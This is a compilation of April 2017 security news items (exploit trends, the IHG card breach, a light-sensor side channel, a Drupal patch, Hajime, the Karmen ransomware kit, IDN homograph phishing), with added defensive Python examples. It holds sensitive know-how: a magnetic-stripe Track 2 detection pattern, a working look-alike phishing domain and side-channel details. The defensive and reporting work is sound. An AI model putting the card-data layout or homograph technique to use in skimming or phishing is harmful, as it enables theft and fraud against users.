In 2016, more than 297,000 users worldwide were attacked by unknown exploits (zero-day and heavily obfuscated known exploits).
2015-2016 witnessed a number of positive developments in the exploit threat landscape. For example, two very dangerous and effective exploit kits – Angler (XXX) and Neutrino – left the underground market, depriving the cybercriminal community of a very comprehensive set of tools created to hack computers remotely.
A number of bug bounty initiatives aimed at highlighting dangerous security issues were launched or extended. Together with the ever-increasing efforts of software vendors to fix new vulnerabilities, this significantly increased the cost to cybercriminals of developing new exploits. A clear victory for the infosec community that has resulted in a drop of just over 20% in the number of private users attacked with exploits: from 5.4 million in 2015 to 4.3 million in 2016.
However, alongside this welcome decline, we’ve registered an increase in the number of corporate users targeted by attacks involving exploits. In 2016, the number of attacks rose by 28.35% to reach more than 690,000, or 15.76% of the total amount of users attacked with exploits. In the same year, more than 297,000 users worldwide were attacked by unknown exploits. These attacks were blocked by our Automatic Exploit Prevention technology, created to detect this type of exploit.
Key findings on exploits used by targeted attackers 2010-2016:
Overall, targeted attackers and campaigns reported on by Kaspersky Lab in the years 2010 to 2016 appear to have held, used and re-used more than 80 vulnerabilities. Around two-thirds of the vulnerabilities tracked were used by more than one threat actor.
Sofacy, also known as APT28 and Fancy Bear, seems to have made use of a staggering 25 vulnerabilities, including at least six, if not more, zero-days. The Equation Group is not far behind, with approximately 17 vulnerabilities in its arsenal, of which at least eight were zero-days, according to public data and Kaspersky Lab’s own intelligence.
Russian-speaking targeted attack actors take three of the top four places in terms of vulnerability use (the exception being Equation Group in second place), with other English- and Chinese-speaking threat actors further down the list.
Once made public, a vulnerability can become even more dangerous: grabbed and repurposed by big threat actors within hours.
Targeted attackers often exploit the same vulnerabilities as general attackers – there are notable similarities between the list of top vulnerabilities used by targeted threat actors in 2010-2016, and those used in all attacks in 2015-2016.
When looking more closely at the applications used by targeted threat actors to mount exploit-based attacks, we weren’t surprised to discover that Windows, Flash and Office top the list.
[Chart: Applications and operating systems most often exploited by targeted attack groups]
Moreover, the recent leak of multiple exploits allegedly belonging to the Equation cyberespionage group highlighted another known but often overlooked truth: the life of an exploit doesn’t end with the release of a security patch designed to fix the vulnerability being exploited.
Our research suggests that threat actors are still actively and successfully exploiting vulnerabilities patched almost a decade ago, as the chart in the report shows.
Everyone loves an exploit
Exploits are an effective delivery tool for malicious payloads and this means they are in high demand among malicious users, whether they are cybercriminal groups, or targeted cyberespionage and cybersabotage actors.
To take just one example, when we looked at our most recent threat statistics we found that exploits for CVE-2010-2568 (used in the notorious Stuxnet campaign) still rank first in terms of the number of users attacked. Almost a quarter of all users who encountered any exploit threat in 2016 were attacked with exploits for this vulnerability.
Conclusion and Advice
The conclusion is a simple one: even if a malicious user doesn’t have access to expensive zero-days, the chances are high that they’d succeed with exploits to old vulnerabilities because there are many systems and devices out there that have not yet been updated.
Even though developers of popular software invest huge resources into finding and eliminating bugs in their products and exploit mitigation techniques, for at least the foreseeable future the challenge of vulnerabilities will remain.
In order to protect your personal or business data from attacks via software exploits, Kaspersky Lab experts advise the following:
Keep the software installed on your PC up to date, and enable the auto-update feature if it is available.
Wherever possible, choose a software vendor which demonstrates a responsible approach to handling vulnerabilities. Check if the software vendor has its own bug bounty program.
If you are managing a network of PCs, use patch management solutions that allow for the centralized updating of software on all endpoints under your control.
Conduct regular security assessments of the organization’s IT infrastructure.
Educate your personnel on social engineering as this method is often used to make a victim open a document or a link infected with an exploit.
Use security solutions equipped with specific exploit prevention mechanisms, or at least behavior-based detection technologies.
Give preference to vendors which implement a multilayered approach to protection against cyberthreats, including exploits.
Hackers Steal Payment Card Data From Over 1,150 InterContinental Hotels
20.4.2017 thehackernews CyberCrime
InterContinental Hotels Group (IHG) is notifying its customers that credit card numbers and other sensitive information may have been stolen after it found malware on payment card systems at 1,174 franchise hotels in the United States.
It's the second data breach that U.K.-based IHG, which owns Holiday Inn and Crowne Plaza, has disclosed this year. The multinational hotel conglomerate confirmed a credit card breach in February which affected 12 of its hotels and restaurants.
What happened?
IHG identified malware accessing payment data from cards used at front desk systems between September 29 and December 29, 2016, but the malware was erased after the investigation got completed in March 2017.
"Many IHG-branded locations are independently owned and operated franchises and certain of these franchisee operated locations in the Americas were made aware by payment card networks of patterns of unauthorized charges occurring on payment cards after they were legitimately used at their locations," read the notice published to IHG’s site on Friday.
What type of information?
The malware obtained credit card data, such as cardholders' names, credit card numbers, expiration dates and internal verification codes, from the card's magnetic stripe, although the company said there is no evidence of any unauthorized access to payment card data after late December.
However, the company cannot confirm that the malware was removed until February and March 2017, when it began its investigation into the data breach.
How many victims?
The total number of affected customers is not revealed by the company, although customers can use a lookup tool IHG has posted on its website to search for hotels by city and state.
The company says this most recent breach mostly affects guests of U.S.-based hotels who stayed between September 29 and December 29, 2016. The 1,174 breached hotels in the US include 163 in Texas, 64 in California, 61 in Florida, 53 in Indiana, 50 in Ohio, 45 in New York, 42 in Michigan and 39 in Illinois, among others.
The only non-U.S. hotel hit by the malware was a Holiday Inn Express in San Juan, Puerto Rico.
Who is not affected by the breach?
Those franchise hotel locations that had implemented IHG's Secure Payment Solution (SPS) – a point-to-point encryption payment acceptance solution – before 29th September 2016 were not affected by this data breach.
IHG is advising all franchise hotels to implement SPS in order to protect themselves from such malware attacks. The company also said that many more properties implemented SPS after September 29, 2016, which ended the malware’s ability to find payment card data.
What is the IHG doing?
IHG has already notified law enforcement of the recent data breach.
Moreover, on behalf of franchisees, the company has been working closely with the payment card networks and a cyber security firm to confirm that the malware has been removed and to evaluate ways for franchisees to enhance their security measures.
What should IHG customers do?
Users are advised to review their payment card statements carefully and to report any unauthorized bank transactions.
You should also consider requesting a replacement card if you visited any of the affected properties during the three months in which the breach was active.
"The phone number to call is usually on the back of your payment card. Please see the section that follows this notice for additional steps you may take," the company says.
IHG is the latest hotel chain to report a potential customer data breach in the past few years, following breaches at Hyatt, Hilton, Mandarin Oriental, Starwood, White Lodging and the Trump Collection, all of which acknowledged finding malware in their payment systems.
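The notice says the malware read cardholder data from the card's magnetic stripe at front-desk systems. The block below is an added example, not code from IHG or its investigators: it shows how a defender can scan a memory or network capture for magnetic-stripe Track 2 records (PAN, expiry, service code) as an indicator that such data is being exposed in clear text, using the Luhn checksum to discard digit runs that merely look like card numbers and masking any hit before it is reported. The sample capture is constructed and uses a well-known test card number.

```python
import re

# Track 2 as encoded on the stripe: ;PAN=YYMM SSS discretionary?
# PAN is 13..19 digits, YYMM is the expiry, SSS the 3-digit service code; the
# discretionary field is where issuers keep the stripe's verification value.
# Compiled on bytes so raw dumps can be fed in without decoding.
TRACK2_RE = re.compile(rb";(?P<pan>\d{13,19})=(?P<exp>\d{4})(?P<svc>\d{3})(?P<disc>\d*)\?")


def luhn_ok(digits: str) -> bool:
    """Luhn checksum: every real PAN passes it, most random digit runs do not."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:           # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask_pan(pan: str) -> str:
    """Keep the BIN (first 6) and last 4 so a finding can be reported without re-exposing the PAN."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def find_track2(buf: bytes) -> list:
    """Return masked Track 2 hits (offset, masked PAN, expiry) whose PAN passes Luhn."""
    hits = []
    for m in TRACK2_RE.finditer(buf):
        pan = m.group("pan").decode("ascii")
        if not luhn_ok(pan):
            continue             # matches the layout but is not a card number
        hits.append({
            "offset": m.start(),
            "pan_masked": mask_pan(pan),
            "expiry_yymm": m.group("exp").decode("ascii"),
        })
    return hits


# Constructed sample capture: terminal chatter, one genuine-looking Track 2 record
# built on the 4111 1111 1111 1111 test number, and one decoy that has the right
# layout but fails the Luhn check.
SAMPLE_CAPTURE = (
    b"\x00\x10POS-TERMINAL-03\x00"
    b";4111111111111111=2512101123456789?"
    b"\x00\x00session-ok\x00"
    b";1234567890123456=2512101?"
    b"\xff\xfe"
)

if __name__ == "__main__":
    for hit in find_track2(SAMPLE_CAPTURE):
        print(hit)
```

Running the block reports a single hit at offset 18 with the PAN shown as `411111******1111`; the decoy is dropped by the Luhn check. Point-to-point encryption, which the notice credits with protecting the SPS-enabled hotels, removes exactly this clear-text pattern from the front-desk system's memory.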
Exfiltrating data from laptop and smartphones via ambient light sensors
20.4.2017 securityaffairs Mobil
A security researcher presented a method to exfiltrate sensitive data from a laptop or a smartphone through built-in ambient light sensors.
The security expert Lukasz Olejnik discovered that it is possible to steal sensitive data by exploiting the ambient light sensors built into many smartphones and laptops.
Ambient light sensors are installed in electronic devices to automatically adjust screen brightness, but Olejnik is warning about the World Wide Web Consortium (W3C) decision “whether to allow websites access the light sensor without requiring the user’s permission.”
In this way, an attacker can analyze variations in brightness through the ambient light sensor and steal sensitive data such as a QR code displayed on a web page for use in an authentication mechanism.
“How exactly can ambient light readings allow extracting private data? Our attack is based on two observations:
The color of the user’s screen can carry useful information which websites are prevented from directly accessing for security reasons.
Light sensor readings allow an attacker to distinguish between different screen colors.” wrote Olejnik in a blog post.
As an example, Olejnik reminds us that many sites change the color of links once a user has visited them; the expert then used the ambient light sensor to detect these changes and access the user’s browsing history.
“For privacy reasons, browsers lie to developers about the colors of links displayed on a page; otherwise a malicious developer could apply :visited styles and detect which websites are present in the user’s history.” continues Olejnik.
The expert highlighted that this kind of attack is very slow: it took 48 seconds to detect a 16-character text string and three minutes and twenty seconds to recognize a QR code.
“In principle, browser sensors can deliver a 60 Hz readout rate. However, this does not mean that we can actually extract 60 bits per second – that’s because the ultimate detection limit is tied to the rate at which a change in screen brightness can be detected by the sensor.” explained Olejnik.
In the tests he conducted, the expert and his team measured a screen-brightness-to-readout latency of 200-300 ms, and for a fully reliable exploit it is more realistic to assume one bit per 500 ms.
Below are examples of detection times obtainable at the above rate:
Plain text string of 8 characters: 24 seconds (assuming 6 bits per character for an alphanumeric string rendered in a known font)
Plain text string of 16 characters: 48 seconds
20×20 QR code: 3 minutes 20 seconds
Detecting 1000 popular URLs in the history: 8 minutes 20 seconds
64×64 pixel image: 34 minutes 8 seconds
The good news is that in some cases the attack is not feasible, because users would not keep a QR code on the screen for so long.
Olejnik also proposes a countermeasure to mitigate the attack: limiting the frequency of ambient light sensor readings exposed through the API and quantizing their output. In this way, the countermeasure does not impact the normal operation of the sensors while preventing abuse.
“The current proposal argues that the following protections are sufficient:
Limit the frequency of sensor readings (to much less than 60Hz)
Limit the precision of sensor output (quantize the result)” concluded Olejnik.
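To make the two proposed protections concrete, the following is an added example (not code from Olejnik's post or the W3C proposal) that models a sensor whose reading is the room's ambient light plus a small, colour-dependent contribution from the screen, and then applies rate limiting and quantization to the readings a page would receive. The lux values are constructed assumptions, not measurements; the point is to show why a coarse quantization step collapses the white/black difference the attack relies on, and how a lower readout rate caps the channel.

```python
from typing import Optional

AMBIENT_LUX = 300.0                          # assumed room light level
SCREEN_LUX = {"white": 12.0, "black": 0.0}   # assumed extra light a white/black screen adds
READOUT_HZ = 60                              # the 60 Hz readout rate the post mentions


def raw_reading(screen_color: str) -> float:
    """Reading a full-precision sensor would report for a given screen colour."""
    return AMBIENT_LUX + SCREEN_LUX[screen_color]


def quantize(lux: float, step: float = 50.0) -> float:
    """Countermeasure 1: round to a coarse step so small screen-induced
    differences collapse onto the same reported value."""
    return round(lux / step) * step


class RateLimiter:
    """Countermeasure 2: deliver at most one reading per min_interval_ms and
    drop the rest (a model of a readout rate well below 60 Hz)."""

    def __init__(self, min_interval_ms: float):
        self.min_interval_ms = min_interval_ms
        self.last_delivered_ms = float("-inf")

    def deliver(self, t_ms: float, value: float) -> Optional[float]:
        if t_ms - self.last_delivered_ms < self.min_interval_ms:
            return None
        self.last_delivered_ms = t_ms
        return value


def evaluate(quantize_step: Optional[float] = None, min_interval_ms: float = 0.0) -> dict:
    """Push one second of alternating white/black frames through the sensor model and
    report how many readings reach the page and whether the two colours still differ."""
    limiter = RateLimiter(min_interval_ms)
    delivered = []
    for i in range(READOUT_HZ):
        color = "white" if i % 2 == 0 else "black"
        lux = raw_reading(color)
        if quantize_step is not None:
            lux = quantize(lux, quantize_step)
        value = limiter.deliver((i * 1000) / READOUT_HZ, lux)
        if value is not None:
            delivered.append(value)

    def observed(color: str) -> float:
        lux = raw_reading(color)
        return quantize(lux, quantize_step) if quantize_step is not None else lux

    return {
        "readings_per_second": len(delivered),
        "colors_distinguishable": observed("white") != observed("black"),
    }


def detection_time_seconds(bits: int, seconds_per_bit: float = 0.5) -> float:
    """Time to leak `bits` bits at the post's realistic rate of one bit per 500 ms."""
    return bits * seconds_per_bit


if __name__ == "__main__":
    print("no mitigation:        ", evaluate())
    print("quantized to 50 lux:  ", evaluate(quantize_step=50.0))
    print("rate limited to 2 Hz: ", evaluate(min_interval_ms=500.0))
    print("16 alphanumeric chars at 6 bits each:", detection_time_seconds(16 * 6), "s")
```

With no mitigation the page sees 60 readings a second and the two screen colours map to different values (312 and 300 lux in this model); with a 50 lux quantization step both round to 300 and the channel disappears, and a 500 ms minimum interval alone cuts the page to two readings a second. The last line reproduces the post's 48-second figure for a 16-character alphanumeric string.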
Introduction to the NIST CyberSecurity Framework for a Landscape of Cyber Menaces
20.4.2017 securityaffairs Cyber
The implementation of the NIST CyberSecurity Framework is of vital importance given the changes taking place in the landscape of zero-day threats.
The NIST CyberSecurity Framework is a guide of good information security practices for businesses and enterprises. It proposes guidance that each enterprise can adapt to its own needs.
The framework gives enterprises and businesses the possibility of applying the principles and the best practices of risk management to upgrade security and resilience of critical infrastructure. It provides organization and structure for the different insights of our time, with the best practices already adopted across the industry.
The Framework is a risk-based approach to managing cyber security risk and is composed of three parts: the Framework Core, the Framework Implementation Tiers, and the Framework Profiles. Each component of the Framework reinforces the connection between business owners and cyber security activities.
The Framework Core consists of five concurrent and continuous Functions: Identify, Protect, Detect, Respond and Recover.
Taken together, these Functions give a high-level, strategic view of the life cycle of an organization’s cyber security risk management. The Framework Implementation Tiers give the context in which an organization understands its cyber security risk and the processes it has established to manage that risk.
The Framework Profile can be defined as an alignment of the standards, guidelines, and practices of the Framework Core to a particular implementation scenario. The Framework Profile can be used to identify opportunities for improving the cyber security posture by comparing the current Profile (“how it is”) with the target Profile (“how it will be”).
By being adaptive, the NIST CyberSecurity Framework can help detect and respond to new threats that appear out of thin air. This includes ransomware, IoT hacking and other new types of malware. Risk management is treated as an ongoing process of identifying, assessing and responding to risk. To manage risk, it is proposed that organizations must understand the probability of an event occurring and the impact that would result from it.
This information gives organizations the capability of determining the acceptable risk level for delivering services, which is expressed by its risk tolerance. This understanding gives organizations the capacity of prioritizing the cyber security activities. It is important to adapt so organizations can respond. The NIST CyberSecurity Framework is available for small business, critical infrastructure services and organizations.
As cloud, big data and analytics reach a new level, so does the potential for damage to health care, the power grid, IoT and businesses. The Framework is elaborated in the form of Tiers to cover all aspects of information security, including best practices for assets and employees. This approach gives organizations the ability to isolate threats, in such a way that detection and mitigation do not affect other assets of the organization.
Source:
https://gcn.com/articles/2017/03/31/cybersecurity-framework-revisions.aspx
nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf
http://csrc.nist.gov/groups/SMA/fisma/sp800-53r5_pre-draft.html
http://www.govinfosecurity.com/groups-say-nist-must-better-address-healthcares-cyber-needs-a-9841
http://www.nextgov.com/cybersecurity/2017/04/bill-improve-small-business-cybersecurity-advances/136750/
http://blog.executivebiz.com/2017/04/tech-firms-urge-nist-to-include-vulnerability-disclosure-processes-in-cybersecurity-framework/
https://www.nist.gov/news-events/news/2014/10/nist-releases-final-version-smart-grid-framework-update-30
https://www.nist.gov/itl/ssd/systems-interoperability-group/health-it-testing-infrastructure
Drupal Patches Critical Access Bypass Flaw
20.4.2017 securityweek Vulnerebility
Updates released for versions 8.2 and 8.3 of the Drupal content management system (CMS) address a critical access bypass vulnerability.
The flaw, discovered by Drupal developer Samuel Mortenson and tracked as CVE-2017-6919, has been classified as critical by the Drupal security team, but it only affects websites if certain conditions are met.
Websites are vulnerable to attacks exploiting this flaw if they have the RESTful Web Services (RESTWS) module enabled and they allow PATCH requests. The attacker must also be able to register an account on the targeted site.
Nevertheless, the security hole is potentially serious, which is why Drupal developers have released a patch not only for the 8.3 branch, but also for the 8.2 series, which has reached end of life and will not receive other updates.
Drupal has advised 8.2.x users to update to Drupal 8.2.8, but still recommends updating to Drupal 8.3 at a later time. In the case of Drupal 8.3, the vulnerability has been patched with the release of version 8.3.1. Drupal 7 is not affected.
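The affected and fixed versions above can be turned into a quick site check. The block below is an added example, not code from the Drupal project or its advisory: it reads the core version Drupal 8 records in core/lib/Drupal.php (assumed to be declared as a `const VERSION = '8.x.y';` class constant) and reports whether the install is below 8.2.8 or 8.3.1 in its branch. It covers only the version condition; whether the RESTful Web Services module is enabled with PATCH allowed must still be checked in the site's configuration. The sample tree the demo writes is constructed.

```python
import re
import tempfile
from pathlib import Path
from typing import Optional, Tuple

# Drupal 8 declares its version as a class constant in core/lib/Drupal.php,
# e.g.  const VERSION = '8.3.0';  (assumption about the file's layout)
VERSION_RE = re.compile(r"const VERSION = '(\d+)\.(\d+)\.(\d+)[^']*'")

# First release per affected branch that contains the fix for CVE-2017-6919.
FIXED_RELEASES = {(8, 2): (8, 2, 8), (8, 3): (8, 3, 1)}


def parse_drupal_version(php_source: str) -> Optional[Tuple[int, int, int]]:
    """Extract (major, minor, patch) from the PHP source; None for dev strings like '8.3.x-dev'."""
    m = VERSION_RE.search(php_source)
    return tuple(int(x) for x in m.groups()) if m else None


def needs_update_for_cve_2017_6919(version) -> bool:
    """True when the version is in an affected branch and older than that branch's fixed release.
    Branches with no entry (Drupal 7, or later 8.x series) are not covered by this advisory."""
    fixed = FIXED_RELEASES.get(tuple(version[:2]))
    return fixed is not None and tuple(version) < fixed


def check_drupal_root(root: Path) -> str:
    """Human-readable verdict for the Drupal install rooted at `root`."""
    source = (root / "core" / "lib" / "Drupal.php").read_text(encoding="utf-8")
    version = parse_drupal_version(source)
    if version is None:
        return "could not determine Drupal version"
    text = ".".join(map(str, version))
    if needs_update_for_cve_2017_6919(version):
        return f"Drupal {text}: update required (CVE-2017-6919)"
    return f"Drupal {text}: not in an affected range"


if __name__ == "__main__":
    # Constructed sample install at 8.3.0, which the advisory places in the affected range.
    with tempfile.TemporaryDirectory() as tmp:
        lib = Path(tmp) / "core" / "lib"
        lib.mkdir(parents=True)
        (lib / "Drupal.php").write_text(
            "<?php\nclass Drupal {\n  const VERSION = '8.3.0';\n}\n", encoding="utf-8")
        print(check_drupal_root(Path(tmp)))
```

The comparison is done on integer tuples rather than strings so that, for instance, 8.2.10 would correctly sort above 8.2.8.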
Vulnerabilities involving the RESTWS module have been known to be exploited in the wild. In September 2016, researchers spotted attempts to exploit a RESTWS flaw that had been patched two months earlier.
The latest updates come only one day after Drupal announced the availability of a patch for a critical flaw affecting a popular third-party module.
The References module, used by more than 121,000 websites, had not been updated since 2013 and Drupal flagged it as unsupported. However, Drupal has managed to find a new maintainer for the module and the security hole has been fixed.
Symantec is monitoring the Hajime IoT malware, is it the work of vigilante hacker?
20.4.2017 securityaffairs IoT
Symantec observed the Hajime IoT malware leaving a message on the devices it infects, is it the work of a cyber vigilante?
The Mirai botnet is the most popular thingbot; it has been targeting poorly configured and flawed ‘Internet of Things’ devices since August 2016, when the threat was first discovered by the researcher MalwareMustDie.
Many other bots threaten the IoT landscape, but recently an antagonist appeared in the wild, its name is Hajime.
Hajime has been spreading quickly in recent months, mostly in Brazil and Iran.
The Hajime malware was first spotted in October 2016; it uses the same mechanism implemented by Mirai to spread itself. The threat targets unsecured IoT devices with open Telnet ports that still use default passwords. Researchers discovered that Hajime uses the same list of username and password combinations as Mirai, plus two more.
Unlike Mirai, Hajime doesn’t use C&C servers, instead, it implements a peer-to-peer network.
“There isn’t a single C&C server address, instead the controller pushes command modules to the peer network and the message propagates to all the peers over time. This is typically considered a more robust design as it makes takedowns more difficult.” reads the analysis published by Symantec.
Hajime is more sophisticated than Mirai, it implements more mechanisms to hide its activity and running processes. The threat has a modular structure allowing operators to add new capabilities on the fly.
The analysis of Hajime reveals that it doesn’t implement distributed denial of service (DDoS) capabilities or any other attack code. Symantec researchers noticed that Hajime fetches a statement from its controller and displays it on the terminal every 10 minutes. The message is:
Just a white hat, securing some systems. Important messages will be signed like this!
Hajime Author.
Contact CLOSED
Stay sharp!
The message is digitally signed, and the worm will only accept messages signed by a hardcoded key. Once it has infected a system, the worm blocks access to ports 23, 7547, 5555, and 5358 in order to prevent attacks from other IoT threats, including Mirai.
Experts believe Hajime could be the work of a cyber vigilante; in the past we have observed similar code, such as Linux.Wifatch, discovered by Symantec in October 2015.
“The problem with these white worms is that they usually turn out to have a short lifespan. That is because their effects are only temporary. On the typical IoT system affected by these worms the changes made to improve the security are only in RAM and not persistent.” observed Symantec.
In the broadcast message, the author refers to themselves as the “Hajime Author” but the name Hajime appears nowhere in the binaries. The name “Hajime” didn’t come from the author, but from the researchers who discovered the malware.
“This shows that the author was aware of the researchers’ report and seemed to have liked the name.” concluded the analysis.
Experts from Symantec also discovered bugs in the Hajime IoT malware and provided signatures for detecting it.
Ransomware as a Service Is Spreading Among Hackers
20.4.2017 SecurityWorld Viruses
Security experts are worried by a new trend. Ransomware as a service can be bought for less than 4,500 CZK.
Cybercriminals can add another easy-to-use weapon to their arsenal: the Karmen ransomware kit, which has appeared on the black market for 175 dollars, i.e. less than 4,500 CZK. It is offered on shady internet forums by a Russian-speaking hacker with the nickname DevBitox, who was flagged by the security company Recorded Future.
According to the company, Karmen falls into the ransomware-as-a-service category, which has seen a worrying expansion lately. Such ransomware can be abused even by novice hackers with minimal knowledge, who for their money receive a whole package of web tools meant for developing their own ransomware attacks.
Working with Karmen is made easy by a simple interface through which users can modify the ransomware; they also get a quick overview of the devices they have managed to infect, plus a view into a “bank” where they see how much their criminal activities have already earned them.
The Russian-speaking DevBitox, probably just one of the developers responsible for Karmen, offers the hacker kit on several shady forums, stating that Russian and English language versions are available. According to Recorded Future’s findings, he has sold twenty copies since last December, which were traced to Germany and the USA. The purchase price of 175 dollars is paid once, up front.
“Such a low price lets more people set out on the hacker path, and it allows buyers to keep one hundred percent of what they manage to extract from the victims of their attacks,” states Recorded Future’s head Andrej Baryšev.
On the other hand, the more technically skilled can relatively easily rescue their data encrypted by Karmen. The malicious code is built on Hidden Tear, an open-source ransomware project that cybercriminals have long used to develop their own ransomware variants, and which security experts have been fighting fairly successfully by releasing free tools for decrypting the “kidnapped” data.
Phishing Attack Swapping IDN Characters in a Domain Is Back on the Scene
20.4.2017 Root Phishing
We have known about the attack called the “Homograph Attack” for sixteen years, yet there is still no perfect defense. New experiments show that we can still fall for domains with substituted characters.
The possibility of registering domains with national characters (IDN) began to appear gradually in individual TLDs in 2004 and 2005. But it has been known since at least 2001 that by swapping characters from different alphabets it is possible to create a domain that at first glance is indistinguishable from the original one. Evgeniy Gabrilovich and Alex Gontmakher called it The Homograph Attack [PDF].
Sixteen years later, security researcher Xudong Zheng shows that the problem still exists and can be exploited for phishing attacks. IDN makes it possible to create a domain name that contains not only ASCII characters but practically any Unicode character. Characters in some alphabets (typically Cyrillic, but others too) closely resemble characters in the Latin alphabet. Moreover, in many fonts they are rendered exactly like the corresponding Latin characters, so they cannot be distinguished by eye.
Compare, for example, these two domains. Can you tell which one is the phishing domain and which one really belongs to Apple?
At first glance they are indistinguishable, and one of them will certainly fool users. The difference is in fact only slight: notice that the lowercase L in the word Apple renders differently. The first domain is the fake one; its name consists solely of Cyrillic characters. In the zone it is recorded as https://www.xn--80ak6aa92e.com/.
Try it yourself:
Apple.com vs. Apple.com
Epic.com vs. Epic.com
Both Firefox and Chrome display all the linked domains correctly; the user has no way of telling that they have landed on a fake page. In this case the sites show a harmless informational page, but technically nothing stops them from phishing the users of the original sites.
Note also that the “phishing” sites use HTTPS with a trusted certificate. Obtaining a DV certificate for such a domain is no problem: the authority verifies only the ability to control the domain; it cannot certify the owner’s good intentions.
Read: Will all phishing sites have a valid certificate?
The certificate authority Let's Encrypt, which was used in the demonstrations, has supported IDN domains since the end of last year and says that security must be ensured by the domain registries. So if a domain can be registered, the authority will issue a certificate for it. That can further help deceive users: the domain is right and it is secured, so everything looks fine. It must be added that the culprit here is not Let's Encrypt but the general principle of weakly verified DV certificates.
A problem of this type can be addressed on both sides: registries can introduce special rules for IDN domains, and browsers can defend users with their own means. Some registries allow registration of domains with only a limited set of Unicode characters; others prevent the mixing of different character sets. Unfortunately this is not a universal and firm rule, because generic domains, for understandable reasons, allow different character sets, just as there are languages where mixing individual sets is common.
Browsers defend themselves very similarly: they display the human-readable variant of the domain only if the displayed domain does not mix different character sets. If the browser encounters such usage, it protects the user by displaying the punycode variant, i.e. the domain name encoded into ASCII. So if, for example, only the first letter of the domain apple.com were replaced with a Cyrillic one, the browser would display xn--pple-43d.com.
In the case of the demo domains Apple and Epic, however, no mixing of sets occurs, because their names contain no Latin characters at all. They are written entirely in Cyrillic and yet are very similar to the original domain names. In the zone they are stored as xn--80ak6aa92e.com and www.xn--e1awd7f.com. The browsers’ defense mechanisms therefore fail.
In Firefox it is possible to switch the display permanently, so that the readable variant is never shown. In about:config, find the option network.IDN_show_punycode and set it to true. For other browsers no such route exists, and users must wait for an update that should fix the problem.
The bug was reported to the Chrome developers in January, and the fix will make it into the next version of Chrome, number 58. Firefox developers also have an open bug and are still discussing a suitable solution. The measure adopted in Chrome will check whether a domain name consists exclusively of characters resembling Latin ones. The check will, however, run only on ordinary Latin-script TLDs, not on IDN TLDs such as рф.
Update: Chrome 58 for desktop has been released and does contain the mechanism described above for defending against this type of domain. It now shows the spoofed Apple.com domain to the user in punycode.
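The two browser rules described above, showing punycode for a label that mixes scripts and (in Chrome 58) for a label that is entirely Cyrillic look-alikes under a Latin-script TLD, can be modelled in a few lines. The block below is an added example, not the Chrome or Firefox implementation; its look-alike table is a constructed subset of Cyrillic letters (the authoritative source is Unicode TR39's confusables data), and the script of a letter is taken from the first word of its Unicode name. Characters are written as escapes so the code itself contains no homoglyphs.

```python
import unicodedata

# Constructed, partial table of Cyrillic letters that render like Latin letters
# in common fonts: а е о р с у х ӏ і ј ԁ ԛ ԝ ѕ һ (assumption; not the full TR39 list).
CYRILLIC_LATIN_LOOKALIKES = set(
    "\u0430\u0435\u043e\u0440\u0441\u0443\u0445\u04cf\u0456\u0458"
    "\u0501\u051b\u051d\u0455\u04bb"
)


def script_of(ch: str) -> str:
    """Script name taken from the first word of the Unicode name (LATIN, CYRILLIC, ...)."""
    return unicodedata.name(ch, "UNKNOWN").split(" ")[0]


def label_scripts(label: str) -> set:
    return {script_of(ch) for ch in label if ch.isalpha()}


def to_unicode_label(label: str) -> str:
    """Decode an A-label (xn--...) to its U-label; other labels pass through unchanged."""
    if label.lower().startswith("xn--"):
        return label[4:].encode("ascii").decode("punycode")
    return label


def to_ascii_label(label: str) -> str:
    """Encode a U-label to the A-label form the zone actually stores."""
    if label.isascii():
        return label
    return "xn--" + label.encode("punycode").decode("ascii")


def whole_script_confusable(label: str) -> bool:
    """Chrome 58 rule as described: every letter is Cyrillic and has a Latin look-alike."""
    letters = [ch for ch in label if ch.isalpha()]
    return bool(letters) and label_scripts(label) == {"CYRILLIC"} and all(
        ch in CYRILLIC_LATIN_LOOKALIKES for ch in letters)


def display_form(domain: str) -> str:
    """What an address bar following the two rules above would show for `domain`."""
    labels = domain.lower().split(".")
    tld_is_idn = labels[-1].startswith("xn--")   # whole-script check skipped under IDN TLDs
    shown = []
    for label in labels:
        u_label = to_unicode_label(label)
        mixed = len(label_scripts(u_label)) > 1
        confusable = (not tld_is_idn) and whole_script_confusable(u_label)
        shown.append(to_ascii_label(u_label) if (mixed or confusable) else u_label)
    return ".".join(shown)


if __name__ == "__main__":
    for d in ["apple.com", "\u0430pple.com", "xn--80ak6aa92e.com", "xn--80ak6aa92e.xn--p1ai"]:
        print(f"{d:25} -> {display_form(d)}")
```

`display_form("\u0430pple.com")` (Latin "pple" with a Cyrillic first letter) yields the mixed-script result xn--pple-43d.com quoted in the article, the all-Cyrillic xn--80ak6aa92e.com stays in punycode because every letter is a look-alike, and the same label under the IDN TLD xn--p1ai (рф) is shown in Unicode, which is the gap the article notes in the Chrome check.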
Recall that our national domain .CZ has not introduced IDN support, because the majority of users have consistently opposed it. The results of the latest survey were published this February: 68 percent of respondents among individual internet users and 71 percent of the organization representatives surveyed came out against introducing the IDN system. The only Czech IDN domain thus remains háčkyčárky.cz, where CZ.NIC collects survey results and explains the drawbacks of IDN domains.
Hackers Took Aim at Hotels and Attacked More Than a Thousand
20.4.2017 Novinky/Bezpečnost Crime
Roughly 1,200 hotels in the United States operating under the brands of the InterContinental Hotels Group (IHG) chain became the target of a hacker attack last year, in which the attackers’ software could collect information from guests’ payment cards. The company announced this.
The hackers’ malicious software could collect information from guests’ payment cards.
Hotel guests were warned that as a result of this attack they could become victims of theft of money. According to IHG, the program was probably active between September 29 and December 29.
“People should carefully check the statements of their payment card accounts,” a company spokeswoman told the BBC. “If they find unauthorized payments, they should inform their bank immediately,” she added.
IHG is based in Britain and owns, for example, the Holiday Inn and Crowne Plaza hotel brands.
Cylance Battles Malware Testing Industry
20.4.2017 securityweek Analysis
Cylance vs. Malware Testing Industry
After a brief respite, the animosity between the incumbent anti-virus vendors and the newcomer machine learning (ML) endpoint protection vendors has returned; and the focus is still on testing.
On Monday this week, Ars Technica published an article with one new element: a test using 48 Cylance-provided malware samples showed 100% detection by Cylance, but somewhat less from competing products. It turned out that nine of the samples were harmless. This "led the engineer [conducting the tests]," wrote Ars, "to believe Cylance was using the test to close the sale by providing files that other products wouldn't detect -- that is, bogus malware only [Cylance] would catch."
